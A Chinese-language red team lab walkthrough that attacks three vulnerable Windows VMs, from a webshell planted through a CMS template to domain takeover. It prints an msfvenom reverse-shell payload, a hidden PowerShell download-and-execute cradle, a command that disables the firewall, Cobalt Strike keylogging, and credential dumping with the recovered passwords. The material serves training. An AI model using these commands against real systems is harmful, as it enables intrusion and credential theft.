2023年7月20日发(作者：)

ATTcK实战系列—红队实战（⼀）【全记录】环境准备共有三台机器，win7是对外的web机，win2003和win2008是内⽹机器3：⽹络拓扑搭建环境1：三台机器都连接到vm1⽹卡2：关闭vmware在vm1⽹卡上的DHCP功能3：给win7添加⼀个⽹卡（win2003和win2008只有⼀块⽹卡），采⽤NAT4：kali使⽤NAT5：给以上机器拍摄快照6：三台靶机全部开机配置靶机下⾯的配置操作建议做⼀下，不然实验的时候会很闹⼼。三台靶机的默认密码是 hongrisec@2019配置win20081：重设密码登录win2008会被提⽰密码已经过期，需要重设密码，重设⼀个即可。注意，你是给liukaifeng01改了密码2：不要⼿贱开机之后会看到⼀个提⽰，要你重启计算机，不要答应它，选择稍后重启，然后就可以不⽤管它了3：推荐设置管理员账号永不过期配置win71：关于移除设备有的⼈会习惯移除“打印机”、“声卡”、“CD/DVD(IDE)”诸类的设备，但是不要在win7上这样做，尤其是不能移除“打印机”，否则phpstudy会启动失败2：不要⼿贱开机之后会看到⼀个提⽰，要你重启计算机，不要答应它，选择稍后重启，然后就可以不⽤管它了3：开启phpstudy在⽂件⽬录：C:4：检查⼀下ip也许你的IP正常，但是我的机器出错了，在⼀块⽹卡使⽤VM1，⼀块⽹卡使⽤NAT的情况下，⽆法获取到NAT的地址。但是其他机器能正常获取NAT地址，⽅案可以参考此处解决办法如下，使⽤三块⽹卡，NAT能够正常使⽤了，但是桥接的⽹卡是192.254.124.253，不能⽤，正好符合实验环境：5：确认web服务开启输⼊win7对外IP可以看到phpStudy探针，说明正常。如果⽹络配置正常还⽆法正常访问，请试试设置防⽕墙规则，然后重启phpStudy信息收集nmap信息收集看到⽬标开启了80、3306端⼝，那就先看看⽹站登录⽹站，⾸先看到如下页⾯存在如下问题：http明⽂传输服务器指纹泄露（系统、Apache、PHP版本）phpinfo信息泄露mysql数据库弱⼝令mysql数据库⼝令爆破phpstudy后门（待检测）⽬录爆破御剑⾛⼀波探测⽹站依次访问御剑爆出的⼀些⽬录：探测phpmyadmin使⽤弱密码root成功登录phpmyadmin，看到了⼀个名为newyxcms的表，（cms：内容管理系统）存在如下问题：外⽹可以访问phpmyadmin（默认情况下只能localhost访问）基本可以确认⽹站使⽤的是yxcms，试试能不能访问，在“公告信息”中知道⽹站后台账密是admin:123456，地址是/?r=admin探测确定了⽹站的版本是1.2.1，可以考虑找⼀找这个版本的漏洞，但是已经在“公告信息”⾥⾯看到了后台登录账密，就不费那⼼思了⽹站后台在“前台模板” 中看见⾃⼰可以编辑模板，模板通常可以⾃定义php⽂件，⽽如果可以⾃定义php⽂件直接就可以上⼀句话⽊马了渗透攻击getshell1：写⼊⼀句话⽊马2：找到所在路径protected/apps/default/view3：蚁剑连接192.168.40.128/yxcms/protected/apps/default/view/default/编码设置使⽤默认的UTF8，有的内容会出现乱码，这⾥使⽤GBK编码收集系统信息关闭防⽕墙：netsh advfirewall set allprofiles state off上传⽊马msfvenom -p windows/meterpreter/reverse_tcp lhost=10.3.139.50 lport=4444 -f exe -o 反弹shell连接msf1：msf监听use exploit/multi/handlershow optionsset payload windows/meterpreter/reverse_tcpset lhost 10.3.139.50run2：启动⽊马win7信息收集当前收到的meterpreter来⾃win71：收集补丁信息run post/windows/gather/enum_patches2：安装的软件信息，发现有nmap，可以直接利⽤nmap对内⽹52⽹段进⾏扫描run post/windows/gather/enum_applications添加路由添加路由：run autoroute -s 192.168.52.0 255.255.255.0查看路由：run autoroute -p内⽹渗透内⽹主机发现使⽤arp扫描，发现内⽹中共有三台主机run post/windows/gather/arp_scanner rhosts=192.168.52.0/24msf起代理meterpreter > background 隐藏到后台use auxiliary/server/socks5show optionsrun修改proxychainssudo vim /etc/ap内⽹主机发现nmap扫描凉凉不怕，还记得在msf收集信息的时候发现win7有nmap吗？使⽤蚁剑来做个扫描。由于依然⽆法只⽤nmap做全⾯的主机发现，所以使⽤msf主机发现的结果来做扫描使⽤Cobalt Strike前⾯做的很不顺利，改⽤Cobalt Strike，使⽤cs的前提是需要获取到shell，即：当蚁剑拿到shell时就可以使⽤cs了cs服务器在kali上⾯启动sudo chmod +x teamserversudo ./teamserver 10.3.139.50 123456 &cs客户机在kali上⾯启动sudo chmod +x ./重启kali依然登录cs被拒，今天真是太难了::>_<::排雷补充：启动cs服务器的时候，不让它在后台运⾏，即可（不过我⽤另外⼀台kali把cs放后台可以正常使⽤）因为种种原因第⼀次做的不⼤顺利，现在第⼆次做，下⾯的4个ip⽆需记忆，只是为了解释部分截图IP不⼀致的问题，重点在于理解操作上的逻辑kali的IP（原本）192.168.40.147----->（现在）10.3.139.50win7的IP（原本）192.168.40.128------->（现在）10.3.139.51设置监听器因为win7是web服务器，所以使⽤HTTP来建⽴连接，这意味着cs不能主动联系⾁鸡，只能⾁鸡来主动连接cs接收命令。默认情况下⾁鸡会每隔60秒来cs服务端下载命令，在服务端执⾏完命令之后，会把命令的执⾏结果以HTTP的POST⽅式传到服务端。（请把下⾯的ip当作是10.3.139.50）⽣成Web Delivery⽣成⽊马，⽂件或者命令接下来它会⽣成⼀个powershell命令，如#powershell 是Windows 系统⾃带组件#⽆需上传⽂件到⽬标服务器磁盘 -nop -w hidden -c "IEX ((new-object ent).downloadstring('192.168.40.147:80/a'))"拿下主机蚁剑的虚拟终端执⾏命令，cs拿到上线主机可以看到，⾁鸡每隔60秒才会来连接服务器，做实验的话太慢了，调整⼀下时间，需要等60秒才能⽣效【下⾯三级标题的内容是给我⾃⼰看的，读者可以忽略】进⼊命令⾏所有的图形化操作都可以在命令⾏⾥⾯显⽰，也可以直接在命令⾏⾥⾯写命令当前⽤户权限⽂件管理beacon|右键|Explore|File Browser进程管理beacon|右键|Explore|Process List屏幕截图截屏beacon|右键|Explore|Screenshots查看截屏View|Screenshots桌⾯控制beacon> desktop键盘记录键盘记录beacon|右键|Explore|Process List|Log Keystrokes查看键盘记录View Keystrokes如果记录键盘的话还是迁移⼀下注⼊的进程⽐较好，不要迁移到SYSTEM的进程⾥⾯去，因为SYSTEM是机器账户，不能登录系统，也⾃然不能记录它的键盘内⽹信息收集端⼝扫描beacon|右键|Explore|Port Scan扫的啥玩意啊，只发现了我⾃个排查⽹络时发现，win7与其他机器⽹络不通了，解除问题之后再扫⼀遍就这？还是nmap吧！cs下nmap正常发挥漏洞扫描扫描过程有点慢，耐⼼点，会拿到丰厚战果（考虑到前⾯使⽤msf拿win7并不好⽤，这⾥仅作扫描，不再联动msf）对192.168.52.141扫描beacon> shell nmap --script=vuln 192.168.52.141[*] Tasked beacon to run: nmap --script=vuln 192.168.52.141[+] host called home, sent: 64 bytes[+] received output:Starting Nmap 7.80 ( ) at 2020-08-22 17:57 ?D1ú±ê×?ê±??[+] received output:Nmap scan report for 192.168.52.141Host is up (0.00s latency).Not shown: 987 closed portsPORT STATE SERVICE21/tcp open ftp|_clamav-exec: ERROR: Script execution failed (use -d to debug)|_sslv2-drown:

135/tcp open msrpc|_clamav-exec: ERROR: Script execution failed (use -d to debug)139/tcp open netbios-ssn|_clamav-exec: ERROR: Script execution failed (use -d to debug)445/tcp open microsoft-ds|_clamav-exec: ERROR: Script execution failed (use -d to debug)777/tcp open multiling-http|_clamav-exec: ERROR: Script execution failed (use -d to debug)1025/tcp open NFS-or-IIS|_clamav-exec: ERROR: Script execution failed (use -d to debug)1028/tcp open unknown|_clamav-exec: ERROR: Script execution failed (use -d to debug)1029/tcp open ms-lsa|_clamav-exec: ERROR: Script execution failed (use -d to debug)1030/tcp open iad1|_clamav-exec: ERROR: Script execution failed (use -d to debug)6002/tcp open X11:2|_clamav-exec: ERROR: Script execution failed (use -d to debug)7001/tcp open afs3-callback|_clamav-exec: ERROR: Script execution failed (use -d to debug)7002/tcp open afs3-prserver|_clamav-exec: ERROR: Script execution failed (use -d to debug)8099/tcp open unknown|_clamav-exec: ERROR: Script execution failed (use -d to debug)MAC Address: 00:0C:29:70:62:5D (VMware)Host script results:| smb-vuln-ms08-067:

| VULNERABLE:| Microsoft Windows system vulnerable to remote code execution (MS08-067)| State: VULNERABLE| IDs: CVE:CVE-2008-4250| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary| code via a crafted RPC request that triggers the overflow during path canonicalization.| code via a crafted RPC request that triggers the overflow during path canonicalization.|

| Disclosure date: 2008-10-23| References:| /en-us/library/security/|_ /cgi-bin/?name=CVE-2008-4250|_smb-vuln-ms10-054: false|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND| smb-vuln-ms17-010:

| VULNERABLE:| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)| State: VULNERABLE| IDs: CVE:CVE-2017-0143| Risk factor: HIGH| A critical remote code execution vulnerability exists in Microsoft SMBv1| servers (ms17-010).|

| Disclosure date: 2017-03-14| References:| /en-us/library/security/| /cgi-bin/?name=CVE-2017-0143|_ /msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/Nmap done: 1 IP address (1 host up) scanned in 125.97 seconds对192.168.52.138扫描beacon> shell nmap --script=vuln 192.168.52.138[*] Tasked beacon to run: nmap --script=vuln 192.168.52.138[+] host called home, sent: 64 bytes[+] received output:Starting Nmap 7.80 ( ) at 2020-08-22 18:02 ?D1ú±ê×?ê±??[+] received output:Nmap scan report for 192.168.52.138Host is up (0.00s latency).Not shown: 982 filtered portsPORT STATE SERVICE53/tcp open domain|_clamav-exec: ERROR: Script execution failed (use -d to debug)80/tcp open http|_clamav-exec: ERROR: Script execution failed (use -d to debug)|_http-csrf: Couldn't find any CSRF vulnerabilities.|_http-dombased-xss: Couldn't find any DOM based XSS.|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.88/tcp open kerberos-sec|_clamav-exec: ERROR: Script execution failed (use -d to debug)135/tcp open msrpc|_clamav-exec: ERROR: Script execution failed (use -d to debug)139/tcp open netbios-ssn|_clamav-exec: ERROR: Script execution failed (use -d to debug)389/tcp open ldap|_clamav-exec: ERROR: Script execution failed (use -d to debug)|_sslv2-drown:

445/tcp open microsoft-ds|_clamav-exec: ERROR: Script execution failed (use -d to debug)464/tcp open kpasswd5|_clamav-exec: ERROR: Script execution failed (use -d to debug)593/tcp open http-rpc-epmap|_clamav-exec: ERROR: Script execution failed (use -d to debug)636/tcp open ldapssl|_clamav-exec: ERROR: Script execution failed (use -d to debug)|_sslv2-drown:

3268/tcp open globalcatLDAP|_clamav-exec: ERROR: Script execution failed (use -d to debug)|_clamav-exec: ERROR: Script execution failed (use -d to debug)3269/tcp open globalcatLDAPssl|_clamav-exec: ERROR: Script execution failed (use -d to debug)|_sslv2-drown:

49154/tcp open unknown|_clamav-exec: ERROR: Script execution failed (use -d to debug)49155/tcp open unknown|_clamav-exec: ERROR: Script execution failed (use -d to debug)49157/tcp open unknown|_clamav-exec: ERROR: Script execution failed (use -d to debug)49158/tcp open unknown|_clamav-exec: ERROR: Script execution failed (use -d to debug)49161/tcp open unknown|_clamav-exec: ERROR: Script execution failed (use -d to debug)49167/tcp open unknown|_clamav-exec: ERROR: Script execution failed (use -d to debug)MAC Address: 00:0C:29:AA:F7:D1 (VMware)Host script results:| smb-double-pulsar-backdoor:

| VULNERABLE:| Double Pulsar SMB Backdoor| State: VULNERABLE| Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)| The Double Pulsar SMB backdoor was detected running on the remote machine.|

| Disclosure date: 2017-04-14| References:| /forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/| /countercept/doublepulsar-detection-script|_ /shadowbrokers/@theshadowbrokers/lost-in-translation|_smb-vuln-ms10-054: false|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED| smb-vuln-ms17-010:

| VULNERABLE:| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)| State: VULNERABLE| IDs: CVE:CVE-2017-0143| Risk factor: HIGH| A critical remote code execution vulnerability exists in Microsoft SMBv1| servers (ms17-010).|

| Disclosure date: 2017-03-14| References:| /en-us/library/security/| /cgi-bin/?name=CVE-2017-0143|_ /msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/Nmap done: 1 IP address (1 host up) scanned in 153.58 seconds对192.168.52.143扫描：beacon> shell nmap --script=vuln 192.168.52.143[*] Tasked beacon to run: nmap --script=vuln 192.168.52.143[+] host called home, sent: 64 bytes[+] received output:Starting Nmap 7.80 ( ) at 2020-08-22 18:08 ?D1ú±ê×?ê±??[+] received output:Nmap scan report for (192.168.52.143)Host is up (0.00s latency).Not shown: 989 closed portsPORT STATE SERVICE80/tcp open http|_clamav-exec: ERROR: Script execution failed (use -d to debug)| http-csrf: | http-csrf:

| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=| Found the following possible CSRF vulnerabilities:

|

| Path: :80/| Form id:

| Form action: /#bottom|

| Path: :80/| Form id:

|_ Form action: /#bottom|_http-dombased-xss: Couldn't find any DOM based XSS.| http-enum:

| /: Possible information file| /phpmyadmin/: phpMyAdmin| /phpMyAdmin/: phpMyAdmin|_ /PHPMyAdmin/: phpMyAdmin| http-phpself-xss:

| VULNERABLE:| Unsafe use of $_SERVER["PHP_SELF"] in PHP files| State: VULNERABLE (Exploitable)| PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.|

| Extra information:|

| Vulnerable files with proof of concept:| //%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=| References:| //Cross-site_Scripting_(XSS)|_ /manual/en/| http-slowloris-check:

| VULNERABLE:| Slowloris DOS attack| State: LIKELY VULNERABLE| IDs: CVE:CVE-2007-6750| Slowloris tries to keep many connections to the target web server open and hold| them open as long as possible. It accomplishes this by opening connections to| the target web server and sending a partial request. By doing so, it starves| the http server's resources causing Denial Of Service.|

| Disclosure date: 2009-09-17| References:| /cgi-bin/?name=CVE-2007-6750|_ /slowloris/| http-sql-injection:

| Possible sqli for queries:| :80/?act=Function%27%20OR%20sqlspider| :80/?act=phpinfo%27%20OR%20sqlspider| :80/?act=Function%27%20OR%20sqlspider| :80/?act=phpinfo%27%20OR%20sqlspider| :80/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000%27%20OR%20sqlspider| :80/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider| :80/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider| Possible sqli for forms:| Form at path: /, form's action: /#bottom. Fields that might be vulnerable:| host| port| login| funName| Form at path: /, form's action: /#bottom. Fields that might be vulnerable:| host| port| login|_ funName|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.|_http-trace: TRACE is enabled135/tcp open msrpc|_clamav-exec: ERROR: Script execution failed (use -d to debug)139/tcp open netbios-ssn|_clamav-exec: ERROR: Script execution failed (use -d to debug)445/tcp open microsoft-ds|_clamav-exec: ERROR: Script execution failed (use -d to debug)1025/tcp open NFS-or-IIS|_clamav-exec: ERROR: Script execution failed (use -d to debug)1026/tcp open LSA-or-nterm|_clamav-exec: ERROR: Script execution failed (use -d to debug)1027/tcp open IIS|_clamav-exec: ERROR: Script execution failed (use -d to debug)1028/tcp open unknown|_clamav-exec: ERROR: Script execution failed (use -d to debug)1029/tcp open ms-lsa|_clamav-exec: ERROR: Script execution failed (use -d to debug)1248/tcp open hermes|_clamav-exec: ERROR: Script execution failed (use -d to debug)3306/tcp open mysql|_clamav-exec: ERROR: Script execution failed (use -d to debug)|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)Host script results:|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED| smb-double-pulsar-backdoor:

| VULNERABLE:| Double Pulsar SMB Backdoor| State: VULNERABLE| Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)| The Double Pulsar SMB backdoor was detected running on the remote machine.|

| Disclosure date: 2017-04-14| References:| /forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/| /shadowbrokers/@theshadowbrokers/lost-in-translation|_ /countercept/doublepulsar-detection-script|_smb-vuln-ms10-054: false|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED| smb-vuln-ms17-010:

| VULNERABLE:| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)| State: VULNERABLE| IDs: CVE:CVE-2017-0143| Risk factor: HIGH| A critical remote code execution vulnerability exists in Microsoft SMBv1| servers (ms17-010).|

| Disclosure date: 2017-03-14| References:| /en-us/library/security/| /msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/|_ /cgi-bin/?name=CVE-2017-0143Nmap done: 1 IP address (1 host up) scanned in 138.36 seconds域内信息收集啥玩意啊，辣鸡收集账号密码直接从内存中导出系统密码beacon> logonpasswords使⽤LaZagne查找本地存储的所有密码使⽤蚁剑将exe⽂件上传到⽬标主机上再执⾏，这⾥可能还是机器的原因，all命令不好⽤，但是其他命令可以正常使⽤C:phpStudy> allC:phpStudy> browsers|====================================================================|| || The LaZagne Project || || ! BANG BANG ! || ||====================================================================|[+] System masterkey decrypted for f22e410f-f947-4e08-8f2a-8f65df603f8d[+] System masterkey decrypted for 1e582198-061f-43f1-abdf-d4e9b606b035[+] System masterkey decrypted for bac7c6bc-5481-420b-b563-762266ca9865########## User: Administrator ##########------------------- Firefox passwords -----------------[+] Password found

URL: 192.168.101.12:8080Login: info@sword: 123456789########## User: liukaifeng01 ##########------------------- Firefox passwords -----------------[+] Password found

URL: 192.168.101.12:8080Login: info@sword: 123456789[+] 2 passwords have been more information launch it again with the -v optionelapsed time = 8.使⽤域账号登录其他主机建⽴隧道由于其他主机使⽤了VM1，所以使⽤SMB建⽴连接target前⾯已经拿到了系统密码，直接⽤域管理员的密码登录相同的⽅法拿下内⽹中的机器138和141战果拓扑图⾏，就到此结束了。